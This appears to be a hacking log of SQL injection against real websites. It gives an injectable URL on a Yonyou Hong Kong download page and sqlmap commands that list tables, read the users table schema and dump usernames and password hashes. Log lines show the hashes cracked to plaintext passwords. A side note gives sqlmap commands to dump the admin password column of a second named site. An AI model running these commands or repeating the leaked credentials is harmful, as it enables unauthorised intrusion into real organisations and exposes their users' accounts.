1. SQL injection at a Yonyou site
Injection point: www.yonyou.com.hk/new/download_view.php?uid=4
2. The database db1007112_ufida contains 39 tables
Parameters: --tables -D "db1007112_ufida"
Database: db1007112_ufida
[39 tables]
+-------------------------+
| admin_log               |
| adpic                   |
| app_cat                 |
| app_company             |
| app_file                |
| app_fileImage           |
| app_fileItem            |
| app_log                 |
| app_login               |
| app_partner             |
| app_staff               |
| banner                  |
| banner_2013             |
| banner_home_2013        |
| content_2013            |
| content_other_2013      |
| content_sub_2013        |
| down_file               |
| downform                |
| downform_2013           |
| download_2013           |
| downlog                 |
| downone                 |
| guestbook               |
| info                    |
| menu                    |
| onepage                 |
| qikan                   |
| qksort                  |
| resources_download_2013 |
| resources_menu_2013     |
| sessions                |
| sort                    |
| stats                   |
| support_2013            |
| tongji                  |
| userlog                 |
| users                   |
| video                   |
+-------------------------+
3. The users table has 12 columns. Table: users
Parameters: --columns -T "users" -D "db1007112_ufida"
[12 columns]
+-------------+---------------------+
| Column      | Type                |
+-------------+---------------------+
| action_list | text                |
| create_time | datetime            |
| creater     | varchar(32)         |
| email       | varchar(60)         |
| nav_list    | text                |
| password    | varchar(32)         |
| phone       | varchar(11)         |
| status      | tinyint(1) unsigned |
| tel         | varchar(11)         |
| true_name   | varchar(60)         |
| users_id    | tinyint(6) unsigned |
| users_name  | varchar(60)         |
+-------------+---------------------+
4. List the data in the user name and password columns.
Parameters: --dump -C "users_name,password" -T "users" -D "db1007112_ufida"
[17:55:26] [INFO] cracked password 'andy' for hash 'da41bceff97b1cf96078ffb249b3d66e'
[17:55:28] [INFO] cracked password 'howard' for hash 'dc5ab2b32d9d78045215922409541ed7'
[17:55:29] [INFO] current status: cuzki… /
[17:55:29] [INFO] cracked password 'jessica' for hash 'aae039d6aa239cfc121357a825210fa3'
[17:55:29] [INFO] cracked password 'johnny' for hash 'f4eb27cea7255cea4d1ffabf593372e8'
[17:55:29] [INFO] cracked password 'lawrence' for hash 'e02d90ea127f923d273786d055b6208e'
[17:55:29] [INFO] cracked password 'louis' for hash '777cadc280bb23ebea268ded98338c39'
5. sqlmap recovers the passwords.
Table: users
[10 entries]
==============================Side note==========================
Using sqlmap against an Access database
1. sqlmap -u http://www.yanet.cn/mbzs.asp?id=132 --tables // list all tables
2. sqlmap -u http://www.yanet.cn/mbzs.asp?id=132 --columns -T admin // list the columns of the admin table
3. sqlmap -u http://www.yanet.cn/mbzs.asp?id=132 --dump -T admin -C password // dump the data in the password column of the admin table